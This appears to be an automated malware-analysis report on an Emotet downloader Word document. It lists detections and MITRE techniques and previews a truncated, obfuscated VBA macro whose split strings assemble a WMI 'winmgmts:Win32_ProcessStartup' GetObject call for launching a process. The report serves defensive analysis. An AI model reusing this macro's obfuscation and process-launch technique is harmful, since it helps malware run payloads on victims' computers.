MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is identified as a malicious document downloader by ClamAV, specifically matching the Emotet family. The presence of a legacy WordBasic auto-exec macro (autoopen) and a GetObject call strongly suggests the execution of a secondary payload. The VBA macro code, though heavily obfuscated, is consistent with Emotet's typical behavior of downloading and executing further stages.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865936-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865936-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53377 bytes |
SHA-256: 39b9db656f585d0f6e73e122a2ce2ed8492e5a9b879b70866a650d2d3a0c76e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "W03649"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S00531__"
Function V003___()
Select Case W71__0
Case 403329919
Set j1635_1_ = n7667_
V981745_ = (R2180_7 * Fix(221096868 / CBool(B99_2_))) - D18_4__1 / Oct(324891223) / 655895788 + CStr(v9868_) - 106392305 + ChrB(Y_4_5___)
Set h060218_ = h9_9_56
End Select
Select Case R38_167
Case 919499308
Set N_5_541_ = w_8017_
s703806_ = (k387_8 * Fix(704734942 / CBool(Z662_5))) - h__974_ / Oct(154980682) / 345639957 + CStr(n2_78_34) - 367700787 + ChrB(E500_97)
Set r14___64 = O8__129
End Select
Select Case J_010_
Case 611073831
Set K64_11 = v70533
q226223 = (Z194622 * Fix(689601851 / CBool(A53_860))) - G_1_68 / Oct(871099858) / 767659880 + CStr(u13488_) - 540957513 + ChrB(R895_54)
Set b1791_ = P407592
End Select
Select Case j7_0975
Case 935710513
Set z_9_589 = t150__
P53__4 = (t8_996_0 * Fix(344385580 / CBool(i47_842))) - Q_2_851 / Oct(585616498) / 371637813 + CStr(b5_7__) - 495982459 + ChrB(D96277_)
Set h096_82 = F4665_7_
End Select
Select Case t059655_
Case 387890685
Set p_1640 = E490_65
O_70_493 = (a_077_3 * Fix(772027418 / CBool(r2_26084))) - L1_780 / Oct(437008989) / 617568502 + CStr(T4_57_6_) - 149238781 + ChrB(h4_13_64)
Set S3237_3_ = i_6695
End Select
Select Case F__760_9
Case 10472895
Set M031__2 = t6565_
E_2_2_9 = (i3__6__ * Fix(376333391 / CBool(d688917))) - j6279672 / Oct(452916432) / 866412782 + CStr(d155_958) - 643856433 + ChrB(P68285)
Set f__62905 = h88_9153
End Select
End Function
Function i_869024(w__382, J7156_2)
On Error Resume Next
Select Case T5420_
Case 44125887
Set G0842_7_ = u884118
a_43356 = (F_0380 * Fix(823499921 / CBool(i2_810))) - W_1313_ / Oct(655267860) / 687012151 + CStr(b5_097__) - 956213578 + ChrB(r76__0)
Set s82__95_ = l7_9_2__
End Select
Select Case d6__63_2
Case 583333181
Set E6_806 = i97_8__
v715__45 = (r5_873 * Fix(275827680 / CBool(K__6_4))) - E85192 / Oct(992204911) / 221834429 + CStr(s3004_37) - 204214098 + ChrB(A0489_)
Set G31483_7 = I_5666
End Select
S_1__95 = i1371_2 + "winm" + "gmts:Win32" + D7_414_9 + "_ProcessStartup" + F7771412
Select Case D0605707
Case 890763360
Set m474_0 = G8464_
f7567469 = (H34191 * Fix(693978343 / CBool(o____06_))) - O3_1_2_8 / Oct(612441167) / 736864485 + CStr(s__82_2_) - 262658177 + ChrB(H8_9070)
Set N_1_63 = i72_5_22
End Select
Select Case a42_6_
Case 589276965
Set a8475982 = m60_37
i2588257 = (z_774003 * Fix(129569388 / CBool(r4453_))) - W_69__38 / Oct(966036698) / 30912404 + CStr(r2_209) - 282560103 + ChrB(E_55__)
Set J55901 = R7712_2
End Select
Select Case K832_42
Case 377019018
Set w910538 = w_6__0
h7_2_6_4 = (C_00_4 * Fix(321035134 / CBool(i04__927))) - h56487__ / Oct(444476268) / 87095537 + CStr(U537854) - 875676868 + ChrB(D_21681)
Set v_760002 = Q___45
End Select
t965769_ = c_28989 + "winm" + "gmts:Win32" + Y52_04 + "_Process" + q13_63
Select Case m684_17
Case 337052983
Set b791__8 = S14_3_4
M194831 = (k__6_325 * Fix(892570338 / CBool(Z_3822))) - j559322 / Oct(592237208) / 796550443 + CStr(V152__7_) - 252186410 + ChrB(u128_4_)
Set Z08_86 = N0951104
End Select
Select Case l4___6_1
Case 732360738
Set D69654 = T69851
i801778_ = (c910127 * Fix(840157709 / CBool(W796298))) - n9_201 / Oct(508443468) / 71530223 + CStr(i_94_02_) - 725619320 + ChrB(B87253_)
Set r_3_6_07 = a1_11__
End Select
Set W_8_52_ = GetObject(z9__8_2 + S_1__95 + T_8_8_)
Select Case z1270743
Case 269622591
Set j7603_ = j_6866_7
U466_0_9 = (u43422 * Fix(830687889 / CBool(A__102))) - b_1__85 / Oct(867945863) / 796508604 + CStr(i0_976) - 952874986 + ChrB(I658870_)
Set k5_33_ = v0_654
End Select
Select Case P9439_
Case 793654361
Set
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.